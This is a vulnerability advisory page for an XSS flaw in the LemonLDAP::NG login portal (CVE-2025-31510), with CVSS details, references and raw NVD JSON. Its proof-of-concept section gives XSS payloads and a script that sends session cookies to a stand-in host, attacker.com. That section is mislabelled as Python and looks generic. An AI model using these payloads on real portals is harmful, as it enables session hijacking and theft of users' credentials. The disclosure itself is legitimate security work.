CVE-2025-31510

Description

In the portal in LemonLDAP::NG before 2.21.0, cross-site scripting (XSS) allows remote attackers to inject arbitrary web script or HTML (into the login page) via the tab parameter, for Choice authentication.

CVSS Details

CVSS Score

7.2

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N

Configurations (Affected Products)

No configuration data available.

LemonLDAP::NG < 2.21.0

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

<!-- CVE-2025-31510 XSS PoC -->
<!-- LemonLDAP::NG Login Page tab Parameter XSS -->

<!-- Method 1: Via URL parameter -->
<!-- https://vulnerable-site/portal/login?tab=<script>alert(document.cookie)</script> -->

<!-- Method 2: Via form submission with encoded payload -->
<!-- tab parameter value: <img src=x onerror=alert('XSS')> -->

<!-- Real-world attack payload example -->
<script>
  // Steal session cookies
  var cookies = document.cookie;
  var attacker = 'https://attacker.com/steal?c=' + encodeURIComponent(cookies);
  new Image().src = attacker;
</script>

<!-- Encoded variant to bypass filters -->
<!-- tab=%3Cimg%20src%3Dx%20onerror%3Dalert%28document.domain%29%3E -->

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-31510
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-31510
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-31510/
[4] VulDB https://vuldb.com/cve/CVE-2025-31510
[5] https://gitlab.ow2.org/lemonldap-ng/lemonldap-ng/-/issues/3341
[6] https://lists.debian.org/debian-lts-announce/2025/04/msg00017.html

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-31510", "sourceIdentifier": "[email protected]", "published": "2026-01-16T18:16:07.363", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "In the portal in LemonLDAP::NG before 2.21.0, cross-site scripting (XSS) allows remote attackers to inject arbitrary web script or HTML (into the login page) via the tab parameter, for Choice authentication."}, {"lang": "es", "value": "En el portal de LemonLDAP::NG anterior a la versión 2.21.0, cross-site scripting (XSS) permite a atacantes remotos inyectar scripts web o HTML arbitrarios (en la página de inicio de sesión) a través del parámetro tab, para la autenticación Choice."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N", "baseScore": 7.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://gitlab.ow2.org/lemonldap-ng/lemonldap-ng/-/issues/3341", "source": "[email protected]"}, {"url": "https://lists.debian.org/debian-lts-announce/2025/04/msg00017.html", "source": "af854a3a-2127-422b-91ae-364da2661108"}]}}